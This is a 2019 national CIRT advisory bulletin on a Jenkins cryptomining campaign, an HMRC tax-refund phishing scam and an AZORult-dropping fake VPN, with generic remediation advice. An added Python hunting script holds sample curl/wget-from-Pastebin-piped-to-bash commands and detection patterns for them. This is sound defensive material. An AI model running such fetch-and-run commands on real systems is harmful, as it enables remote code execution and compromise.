Apache Jenkins | Tax Refund | Azorult

Alert ID: JMCIRT-AL-2019.023
Alert Date: Tuesday, May 21, 2019
Threat Level: High


Apache Jenkins

Original release date: May 13, 2019

Jamaica CIRT has become aware of an attack targeting vulnerable Apache Jenkins installations to deliver cryptocurrency mining software.

Overview

The attackers in this ongoing campaign identified public-facing servers running a version of Apache Jenkins vulnerable to CVE-2018-1000861 and exploited the vulnerability by sending a specially crafted HTTP GET request. In this particular case, curl and wget were used to download content from Pastebin, which was then piped to bash for execution. This content was identified to be a shell script that killed running cryptomining processes and proceeded to download and execute another malicious file. Additionally, it attempts to move laterally on the network using local ssh keys. The file downloaded by the shell script was identified to be a dropper for the cryptomining software. The dropper also performed rootkit-like behaviour by hooking into various functions to render the dropped files unreadable by users and to hide the network connections associated with the malicious activity.
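The download-and-pipe-to-shell chain described above leaves a recognisable trace in process-execution telemetry. The following is an added hunting example, not part of the original advisory: it scores constructed, hypothetical process records (the `user=... ppid_comm=... cmd=...` format and the `jenkins`/`java` service names are assumptions) for a downloader fetching from Pastebin, output piped straight into a shell, and execution from the Jenkins service process.

```python
import re

# Constructed sample records in a hypothetical "user= ppid_comm= cmd=" format.
# These are not real logs; the paste IDs are placeholders.
SAMPLE_EVENTS = [
    'user=jenkins ppid_comm=java cmd=curl -fsSL https://pastebin.com/raw/EXAMPLE1 | bash',
    'user=jenkins ppid_comm=java cmd=wget -q -O - http://pastebin.com/raw/EXAMPLE2 | sh',
    'user=deploy ppid_comm=sshd cmd=curl -sS https://example.org/health',
    'user=jenkins ppid_comm=java cmd=/usr/bin/git fetch origin',
    'user=root ppid_comm=bash cmd=wget https://pastebin.com/raw/EXAMPLE3 -O /tmp/x.sh',
]

EVENT = re.compile(r'user=(\S+) ppid_comm=(\S+) cmd=(.*)$')
DOWNLOADER = re.compile(r'\b(curl|wget)\b')
PASTE_HOST = re.compile(r'https?://(?:www\.)?pastebin\.com/', re.I)
PIPE_TO_SHELL = re.compile(r'\|\s*(?:ba|da|z)?sh\b')

# Hypothetical service account and parent process for a Jenkins master.
JENKINS_USER, JENKINS_PARENT = 'jenkins', 'java'


def assess(line):
    """Return a verdict dict for one record, or None if it does not parse."""
    m = EVENT.match(line)
    if not m:
        return None
    user, parent, cmd = m.groups()
    reasons = []
    if DOWNLOADER.search(cmd) and PASTE_HOST.search(cmd):
        reasons.append('downloader fetching from pastebin')
    if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append('download piped directly to a shell')
    # Only escalate on the Jenkins service context when something else fired;
    # Jenkins jobs legitimately run curl and wget all day.
    if reasons and user == JENKINS_USER and parent == JENKINS_PARENT:
        reasons.append('spawned from the Jenkins service process')
    severity = 'high' if len(reasons) >= 2 else 'medium' if reasons else None
    return {'user': user, 'cmd': cmd, 'severity': severity, 'reasons': reasons}


def hunt(lines):
    """Keep only records that triggered at least one indicator."""
    return [r for r in map(assess, lines) if r and r['severity']]


if __name__ == '__main__':
    for hit in hunt(SAMPLE_EVENTS):
        print(hit['severity'], hit['user'], '|', '; '.join(hit['reasons']))
```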

Recommendations

Ensure anti-virus software and associated files are up to date.
Search for existing signs of the indicated IOCs in your environment.
Block all URL- and IP-based IoCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, and apply any other course of action, resources or applications needed to remediate this threat.
Keep applications and operating systems running at the current released patch level.


Tax Refund Phishing Scam

Original release date: May 13, 2019

Jamaica CIRT has become aware of a new phishing email campaign.

Overview

The email pretends to come from the HMRC (Her Majesty's Revenue Commission) and claims to be a Council Tax refund. Once a victim opens the PDF attachment, they are directed to click a link in order to receive their refund. Upon clicking, they are redirected to a site maintained by the threat actors and are prompted for the following information: name, address, phone number, date of birth, email address, mother’s maiden name, and financial details. The last page a victim views in this scam is a prompt letting them know that they will be refunded by a certain date, which, of course, is the furthest thing from the truth.

Recommendations

Raise awareness on password/credentials hygiene and detecting phishing attempts.
Ensure anti-virus software and associated files are up to date.
Search for existing signs of the indicated IOCs in your environment.
Block all URL- and IP-based IoCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, and apply any other course of action, resources or applications needed to remediate this threat.


Azorult Info Stealing Trojan

Original release date: May 14, 2019

Jamaica CIRT has become aware of adware bundles distributing a VPN application named “Pirate Chick” that ultimately downloads and installs malicious payloads.

Overview

The VPN program was found as an "offer" in several adware bundles, such as fake Adobe Flash installers. Upon execution, the fake VPN installer first checks for the presence of analysis tool processes, such as Wireshark, Regshot and ProcessHacker, and if any are found it skips the malware installation. The next check is a geolocation lookup that skips the malware install if the originating IP is in Russia, Belarus, Ukraine, or Kazakhstan. The final check is to determine whether the host is running VMware, VirtualBox, or Hyper-V. If all the checks pass, a text file is downloaded from the Pirate Chick VPN website. The file contains base64-encoded content that is subsequently decoded and saved as an executable. Currently, the executable being distributed is the legitimate Sysinternals Process Monitor tool, but during the initial analysis the AZORult information stealer was being downloaded instead. After installing the malicious payload, the VPN software is installed and the user receives a link to a sign-up page, which is currently broken. The researchers note that although the VPN installer is currently installing the legitimate Procmon.exe executable, the attacker could host any malicious file on their website.

Recommendations

Ensure anti-virus software and associated files are up to date.
Search for existing signs of the indicated IOCs in your environment.
Block all URL- and IP-based IoCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, and apply any other course of action, resources or applications needed to remediate this threat.
Keep applications and operating systems running at the current released patch level.